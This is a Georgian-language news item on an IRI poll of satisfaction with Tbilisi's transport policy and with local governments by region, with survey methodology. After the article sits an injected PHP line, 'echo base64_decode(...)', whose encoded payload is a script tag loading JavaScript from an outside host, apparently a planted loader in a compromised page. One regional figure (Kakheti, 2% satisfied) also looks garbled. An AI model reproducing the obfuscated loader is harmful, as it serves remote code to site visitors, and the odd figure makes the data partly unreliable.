celsiusi
ავერსი საქკაბელი

თბილისში გამოკითხულთა 57% ქალაქის ახალ სატრანსპორტო პოლიტიკას არ ეთანხმება. ამას საერთაშორისო რესპუბლიკური ინსტიტუტის (IRI) ახალი საზოგადოებრივი აზრის კვლევა (Center for Insights in Survey Research) აჩვენებს.

გამოკითხვის მიხედვით, 39% ახალ სატრანსპორტო პოლიტიკას ეთანხმება, 4%-ი კი აღნიშნულ კითხვას არ პასუხობს.

გარდა ამისა, IRI-ის გამოკითხვის მიხედვით, თბილისის გამოკითხული მოსახლეობის 34% კმაყოფილია ქალაქის მერიის საქმიანობით, 47% კი უკმაყოფილო.

რაც შეეხება სხვა მუნიციპალიტეტებს, გამოკითხვა აჩვენებს, რომ ყველაზე მეტად მოსახლეობა ადგილობრივი თვითმმართველობების მუშაობით კმაყოფილია აჭარაში, ხოლო ყველაზე უკმაყოფილოა მცხეთა-მთიანეთში.

კერძოდ, კახეთში 2% ადგილობრივი თვითმმართველობების მუშაობით კმაყოფილია, 46% უკმაყოფილო; შიდა ქართლში - 59% კმაყოფილი, 32% - უკმაყოფილო; ქვემო ქართლში - 69% კმაყოფილი, 26% - უკმაყოფილო; სამცხე-ჯავახეთში - 55% კმაყოფილი, 40% - უკმაყოფილო; აჭარაში - 70% კმაყოფილი, 26% - უკმაყოფილო; გურიაში 63% კმაყოფილი, 37% - უკმაყოფილო; სამეგრელოსი 63% კმაყოფილი, 26% - უკმაყოფილო; იმერეთში 64% კმაყოფილი, 27% - უკმაყოფილო; მცხეთა-მთიანეთში კი 39% კმაყოფილი, ხოლო 50% - უკმაყოფილო.

ცნობისთვის: კვლევა 2023 წლის 4-23 მარტის პერიოდში საერთაშორისო რესპუბლიკური ინსტიტუტის კვლევების ცენტრის სახელით, ბალტიის კვლევებისა და გელაპის ორგანიზაციის წარმომადგენლის დოქტორი რასა ალიშაუსკინეს მიერ ჩატარდა. კვლევის საველე სამუშაოები ჩატარდა „IPM“-ისმიერ. მონაცემები შეგროვდა პირისპირ ინტერვიუს გზით. შერჩევა მოიცავდა საარჩევნო ხმის უფლებისა და ასაკის მქონე 1500 რესპონდენტს. მონაცემები შეწონილ იქნა ასაკის, სქესის, რეგიონისა და დასახლების ზომის შესაბამისად. ცდომილების ზღვარი წარმოადგენს +/- 2.5 %, გამოპასუხების მაჩვენებელი - 63%. კვლევის განხორციელება შესაძლებელი გახდა ამერიკელი ხალხის მხარდაჭერით, აშშ-ის საერთაშორისო განვითარების სააგენტოს მეშვეობით. 

249
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");